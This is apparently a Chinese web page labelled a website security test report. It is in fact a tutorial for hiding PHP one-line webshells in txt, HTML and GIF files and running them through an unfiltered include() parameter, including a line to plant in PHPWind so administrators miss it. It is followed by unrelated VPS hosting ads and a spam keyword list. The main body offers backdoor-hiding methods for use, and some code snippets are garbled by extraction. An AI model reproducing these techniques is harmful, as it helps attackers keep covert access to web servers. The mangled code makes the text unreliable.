文件网站安全测试报告

网站安全测试  时间:2021-02-14  阅读:()

网站安全测试报告

最近很多朋友都在问我是否能把我那一句话木马隐藏到HTML或图片里其实把一句话木马插入到PHP文件中就已经很隐蔽了如果说硬是要放到HTML文件或图片里就接着往下看这篇的篇测试报告吧。要知道如果光把P HP语句放到图片里是无论如何也不能执行的 因为PHP只解析扩展名为php的文件。所以说要能使隐藏在图片里的PHP语句执行。我们就的借助PHP中的调用函数 include、 require等。

我们还记得前些日子把木马隐藏到图片的文章吧。也就是在PHP文件里用include("x.gif")这样的语句来调用隐藏在图片的木马语句。 ASP中语句也类似。看似非常隐蔽但直接调用图片对稍微懂点PHP的人就不难发现可疑之处。 由于URL里用GET方式很难传递参数这就使得插入木马的性能得不到发挥。

Include函数在PHP中使用的比较频繁所以引起的安全问题也实在太多例如PHPWIND1.36的漏洞就是因为include后面的变量没做过滤引起的。 由此我们就可以构造类似的语句来插入到PHP文件中。然后把木马隐藏到图片或HTML文件里可以说隐蔽性就更高了。如在PHPWIND论坛里插入下面的语句

‘’?@includeinclud/.$PHPWIND_ROOT;?一般管理员是无法看出来的。

有了include函数来辅助帮忙我们就可以把PH P木马隐藏到诸如txt、 html和图片文件等很多类型的文件里来了。 因为txt、 html和图片文件这三种类型的文件最无论在论坛还是文章系统里是最为常见的了下面我们就依次来做测试。

首先建立一PHP文件test.php文件内容为:

$test=$_GET[''' 'test'' ' '];

@include' ' ''test/' ''' .$test;

?

Txt文件一般都是说明文件所以我们把一句话木马放到目录的说明文件里就O K了。随便建立一个TX T文件t.txt。我们把一句话木马粘贴到t.txt文件里。然后访问

//localhost/test/test.php?test=. ./t.txt如果你看到t.txt的内容就证明Ok了然后把在lanker微型PHP后门客户端木马地址添入//localhost/test/test.php?test=. ./t.txt密码里添入cmd就可以了执行返回的结果都可以看到。

对于HTML的文件一般都为模版文件。为了使插入到HTML的文件的木马能被调用执行而且不被显示出来我们可以在HTML里加入一个隐藏属性的文本框如然后使用方法同上。执行的返回结果一般都可以查看源文件看到。如使用查看本程序目录功能。查看源文件内容为我可以得到目录为C:\Uniserver2_7s\www\test。

下面我们说说图片文件要说最为毒的一招莫过于把木马隐藏到图片里。我们可以直接对一个图片进行编辑把插入到图片末尾

经测试一般都不会对图片造成影响。然后同样方法客户端木马地址添入

我们查看P HP环境变量返回的是结果是原图片。

这里可能要和我们想象的结果有些差距了其实命令已经运行了只是返回的结果看不到而已 因为这是真正的GIF文件所以是不会显示返回结果的 为了证明是否真的执行了命令我们执行上传文件命令。果不出所料文件已经成功上传到服务器上。这样伪造的优点是隐蔽性好。缺点也自然不用说了是没回显。如果你想看到返回的结果那就拿出记事本伪造一个假的图片文件吧。

到这里就基本测试完了 怎样隐蔽PHP后门就看你自己的选择了。行文仓促如有不妥之处请指出!

pacificrack:VPS降价,SSD价格下降

之前几个月由于CHIA挖矿导致全球固态硬盘的价格疯涨,如今硬盘挖矿基本上已死,硬盘的价格基本上恢复到常规价位,所以,pacificrack决定对全系Cloud server进行价格调整,降幅较大,“如果您是老用户,请通过续费管理或升级套餐,获取同步到最新的定价”。官方网站:https://pacificrack.com支持PayPal、支付宝等方式付款VPS特征:基于KVM虚拟,纯SSD raid...

Boomer.host:$4.95/年-512MB/5GB/500GB/德克萨斯州(休斯顿)

部落曾经在去年分享过一次Boomer.host的信息,商家自述始于2018年,提供基于OpenVZ架构的VPS主机,配置不高价格较低。最近,主机商又在LET发了几款特价年付主机促销,最低每年仅4.95美元起,有独立IPv4+IPv6,开设在德克萨斯州休斯顿机房。下面列出几款VPS主机配置信息。CPU:1core内存:512MB硬盘:5G SSD流量:500GB/500Mbps架构:KVMIP/面板...

Linode 18周年庆典活动 不断改进产品结构和体验

今天早上相比很多网友和一样收到来自Linode的庆祝18周年的邮件信息。和往年一样,他们会回顾在过去一年中的成绩,以及在未来准备改进的地方。虽然目前Linode商家没有提供以前JP1优化线路的机房,但是人家一直跟随自己的脚步在走,确实在云服务器市场上有自己的立足之地。我们看看过去一年中Linode的成就:第一、承诺投入 100,000 美元来帮助具有社会意识的非营利组织,促进有价值的革新。第二、发...

网站安全测试为你推荐
weipin唯品金融是什么?大家基本都怎么用呢?郭吉军郭吉军和管鹏这两个站长怎么样?群里有人骂依赖注入请问下依赖注入的三种方式的区别微信如何建群微信怎么建立群网店推广网站可以介绍几个可以做店铺推广的网站吗?qq怎么发邮件怎么发送QQ邮件数据库损坏数据库损坏是怎么回事啊?保护气球为什么会那么害怕气球创维云电视功能创维健康云电视有什么功能?bt封杀现在是全面封杀BT下载了吗?现在都找不到BT下载影片了
m3型虚拟主机 东莞服务器租用 宿迁服务器租用 花生壳免费域名申请 过期域名抢注 大硬盘 linode日本 dreamhost pw域名 回程路由 softbank邮箱 河南m值兑换 网络空间租赁 百度云1t 息壤代理 搜索引擎提交入口 raid10 环聊 丽萨 浙江服务器 更多